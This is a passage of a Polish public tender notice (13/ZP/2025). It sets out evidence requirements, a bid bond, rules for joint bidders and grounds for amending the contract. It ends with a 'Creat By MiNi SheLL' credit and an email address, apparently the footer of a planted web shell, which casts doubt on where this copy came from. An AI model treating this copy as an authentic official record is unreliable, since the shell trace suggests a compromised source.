mowa w ust. 1 pkt 1.2. SWZ, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>4.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór treści zobowiązania stanowi Załącznik nr 7 do SWZ.<br/>5.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1)	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2)	wykazu usług (w zakresie wskazanym w rozdz. VI ust. 1 pkt 1.2. ppkt 1.2.2 SWZ) wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (wg wzoru stanowiącego załącznik nr 4 do SWZ) oraz załączeniem dowodów określających, czy usługi te zostały wykonane należycie, przy czym dowodami są:<br/>a.	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, <br/>b.	a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; <br/>3)	wykazu osób (w zakresie wskazanym w rozdz. VI ust. 1 pkt 1.2. ppkt 1.2.3 SWZ), skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg wzoru stanowiącego Załącznik nr 5 do SWZ).<br/>4)	dokumentów dotyczących podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp, w celu wykazania spełnienia w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu – jeżeli Wykonawca polega na zasobach podmiotu trzeciego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 10 000,00 zł.<br/>2.	Wykonawca zobowiązany jest wnieść wadium w formie przewidzianej w art. 97 ust. 7 ustawy Pzp przed upływem terminu składania ofert i utrzymywać je nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3.	Wadium wnoszone w pieniądzu należy przelać na rachunek Zamawiającego nr 26 1090 1098 0000 0001 5739 3150 z dopiskiem „Wadium do postępowania nr 13/ZP/2025”. Wykonawca wnoszący wadium w pieniądzu zobowiązany jest do wpłacenia go odpowiednio wcześniej, tak aby znalazło się ono na rachunku bankowym Zamawiającego przed datą i godziną składania ofert. <br/>4.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający przechowuje je na rachunku bankowym. Zamawiający zwraca wadium wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy. <br/>5.	W przypadku wniesienia wadium w każdej dopuszczalnej formie innej niż pieniądz, określonej w art. 97 ust. 7 ustawy Pzp, Wykonawca jest zobowiązany do dostarczenia Zamawiającemu oryginału gwarancji lub poręczenia, w postaci elektronicznej. <br/>6.	Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4 ustawy Pzp, powinno być nieodwołalne i musi gwarantować Zamawiającemu bezwarunkową wypłatę na jego pierwsze pisemne żądanie kwoty wadium w przypadkach określonych w art. 98 ust. 6 ustawy Pzp, bez jakichkolwiek dodatkowych zastrzeżeń i warunków. <br/>7.	Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 98 ust. 1-2 ustawy Pzp. <br/>8.	Zamawiający zatrzymuje wadium wraz z odsetkami według zasad określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>1)	w przypadku spółki cywilnej Zamawiający przyjmuje, że Wykonawcami są wspólnicy spółki cywilnej, których udział w postępowaniu traktowany jest jako wspólne ubieganie się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp; <br/>2)	Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3)	Pełnomocnictwo do dokonywania czynności, o których mowa w pkt 2 powinno mieć postać dokumentu stwierdzającego ustanowienie pełnomocnika, podpisanego przez uprawnionych do ich reprezentacji przedstawicieli wszystkich pozostałych Wykonawców. Pełnomocnictwo należy dołączyć do oferty;<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>5)	Oferta musi być podpisana w taki sposób, by wiązała wszystkich Wykonawców występujących wspólnie;<br/>6)	Wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą występującym jako pełnomocnik pozostałych (liderem);<br/>7)	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców;<br/>8)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają łącznie Formularz ofertowy.<br/>9)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający, poza możliwością zmiany zawartej umowy na podstawie PZP, przewiduje również możliwość dokonywania istotnych zmian postanowień zawartej Umowy w następujących okolicznościach:<br/>1)	zmiana terminów wykonania Umowy:<br/>1.1)	z przyczyn od Wykonawcy niezależnych, których nie można było przewidzieć w chwili zawarcia Umowy, nie jest możliwe dotrzymanie terminu wykonania Przedmiotu Umowy;<br/>1.2)	ze względu na konieczność wykonania prac dodatkowych lub zamiennych niezbędnych dla prawidłowego wykonania Przedmiotu Umowy;<br/>1.3)	wynikająca z okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności pisemne wstrzymanie prac Wykonawcy przez Zamawiającego;<br/>1.4)	wynikająca z działania lub braku działania organów administracji i innych podmiotów <br/>o kompetencjach zbliżonych do organów administracji, w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br/>a)	w wyniku przekroczenia zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma – typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.,<br/>b)	odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę; <br/>c)	wynikająca z konieczności koordynacji prac wykonywanych w ramach niniejszej umowy z pracami lub innymi czynnościami prowadzonymi przez inne podmioty lub skutkującymi koniecznością wprowadzenia zmian do przyjętych przez Wykonawcę rozwiązań;<br/>d)	wynikająca z konieczności zastosowania odmiennych rozwiązań z uwagi na uzgodnienia z podmiotami, o których mowa w lit. a) – c) powyżej, czas niezbędny dla wprowadzenia odmiennych rozwiązań lub o czas przekroczenia typowych w danych okolicznościach terminów dokonania uzgodnień;<br/>1.5)	wystąpienia siły wyższej to znaczy niezależnego od stron Umowy losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia Umowy <br/>i któremu nie można było zapobiec mimo dochowania należytej staranności;<br/>1.6)	wynikająca ze szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do wykonania Przedmiotu Umowy;<br/>1.7)	wynikająca z innych przyczyn zewnętrznych niezależnych od Wykonawcy skutkujących brakiem możliwości prowadzenia prac lub wykonywania innych czynności przewidzianych Umową, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie;<br/>1.8)	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na wykonanie Przedmiotu umowy;<br/>1.9)	w przypadku, gdy okoliczności związane z ogłoszeniem lub trwaniem stanu epidemii, stanu zagrożenia epidemicznego lub związane z konfliktem zbrojnym spowodowały niezawinione przez Wykonawcę opóźnienie;<br/>1.10)	kolizja z planowanymi lub równolegle realizowanymi przez inne podmioty pracami projektowymi lub planistycznymi.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 pkt 1) termin wykonania Umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania Przedmiotu Umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności oraz możliwa jest zmiana sposobu rozliczania wynagrodzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://operabaltycka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. informacji dot. zmiany umowy:<br/><br/>2)	zmiana sposobu wykonania:<br/>2.1)	niezależna od Wykonawcy konieczność zrealizowania Przedmiotu umowy według innych założeń niż wskazane w SWZ wraz załącznikami;<br/>2.2)	konieczność wykonania prac, które nie wynikają z OPZ, a które z przyczyn od Wykonawcy niezależnych stały się niezbędne dla prawidłowego wykonania Przedmiotu umowy;<br/>2.3)	wynikająca z działań organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji, w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję lub wynikająca z przeprowadzonych konsultacji społecznych;<br/>2.4)	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na wykonanie Przedmiotu Umowy;<br/>2.5)	uzasadnionych zmian w zakresie sposobu wykonania Przedmiotu Umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;<br/>2.6)	wystąpienia siły wyższej, to znaczy niezależnego od stron Umowy losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia Umowy <br/>i któremu nie można było zapobiec mimo dochowania należytej staranności;<br/>2.7)	wynikająca z konieczności koordynacji prac wykonywanych w ramach niniejszej Umowy lub zastosowania odmiennych, od wynikających z SWZ lub przyjętych przez Wykonawcę, rozwiązań w związku z pracami lub innymi czynnościami prowadzonymi przez inne podmioty,<br/>2.8)	okoliczności związane z ogłoszeniem, trwaniem stanu epidemii lub stanu zagrożenia epidemicznego lub związane z konfliktem zbrojnym.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 pkt 2) możliwa jest w szczególności zmiana sposobu wykonania, zakresu prac objętych Umową, zmiana terminów zakończenia Przedmiotu Umowy, zmiana sposobu rozliczania wynagrodzenia lub zmiana wysokości wynagrodzenia.<br/>3)	wprowadzenie lub zmiana podwykonawcy prac;<br/>4)	zmiana osób skierowanych przez Wykonawcę do realizacji Umowy zgodnie z treścią złożonej przez Wykonawcę oferty w przypadku wystąpienia niezależnych od Wykonawcy okoliczności uniemożliwiających wykonywanie obowiązków przez którąś z tych osób, których nie można było przewidzieć w chwili upływu terminu składania ofert pod warunkiem, że osoby skierowane do realizacji Umowy będą posiadały co najmniej taki sam poziom wymaganego przez Zamawiającego wykształcenia, kwalifikacji oraz nie mniejsze doświadczenie niż odpowiednie osoby wskazane w ofercie Wykonawcy;<br/>5)	dopuszczalna prawem zmiana stron umowy lub oznaczenia stron Umowy, zaistnienia omyłki pisarskiej lub rachunkowej bądź innej omyłki polegającej na niezgodności treści Umowy z ofertą Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com